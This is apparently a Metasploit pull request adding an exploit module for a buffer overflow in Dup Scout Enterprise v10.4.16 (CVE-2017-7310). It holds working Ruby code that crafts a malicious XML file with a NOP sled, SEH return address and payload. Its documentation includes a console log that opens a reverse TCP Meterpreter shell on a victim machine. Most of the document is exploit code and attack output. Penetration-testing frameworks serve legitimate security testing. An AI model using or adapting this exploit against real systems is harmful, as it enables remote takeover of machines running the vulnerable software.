### PR TITLE
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md
+++ b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md
@@ -1,0 +1,45 @@
+This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
+
+## Vulnerable Application
+
+This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe).
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `exploit/windows/fileformat/dupscout_xml`
+3. Do: `set PAYLOAD [PAYLOAD]`
+4. Do: `run`
+
+## Example
+```
+msf > use exploit/windows/fileformat/dupscout_xml 
+msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146 
+LHOST => 172.16.40.146
+msf exploit(windows/fileformat/dupscout_xml) > run
+
+[*] Creating 'msf.xml' file ...
+[+] msf.xml stored at /root/.msf4/local/msf.xml
+msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler 
+msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(multi/handler) > set LHOST 172.16.40.146 
+LHOST => 172.16.40.146
+msf exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.16.40.146:4444 
+[*] Sending stage (179779 bytes) to 172.16.40.144
+[*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000
+
+meterpreter > sysinfo 
+Computer        : PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > 
+```

--- a/modules/exploits/windows/fileformat/dupscout_xml.rb
+++ b/modules/exploits/windows/fileformat/dupscout_xml.rb
@@ -1,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
+      'Description'     => %q(
+        This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
+        by using the import command option to import a specially crafted xml file.
+      ),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Daniel Teixeira'
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-7310' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Payload'         =>
+        {
+          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
+          'StackAdjustment' => -3500
+        },
+      'Targets'         =>
+        [
+          ['Windows Universal', { 'Ret' => 0x651BB77A  } ]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Mar 29 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
+      ])
+  end
+
+  def exploit
+    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
+    jmp = "\xFF\xE0" # JMP ESP
+
+    buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
+    buffer << "\x90" * 1560
+    buffer << [target.ret].pack('V')
+    buffer << "\x90" * 16
+    buffer << esp
+    buffer << jmp
+    buffer << "\x90" * 70
+    buffer << payload.encoded
+    buffer << "\x90" * 5000
+    buffer << "\n</classify>"
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+  end
+end


### PR DESCRIPTION
This PR adds a module to exploit a buffer overflow in Dup Scout Enterprise v10.4.16 using the Import Command option.

## Verification

List the steps needed to make sure this thing works

- [x] Install the application
- [x] Start `msfconsole`
- [x] `use exploit/windows/fileformat/dupscout_xml`
- [x] Set the payload
- [x] Run
- [x] Start a listener using multihandler
- [x] Set the payload
- [x] Run
- [x] Copy the file to the target machine and use the import option to import the crafted XML file
- [x] Get a session
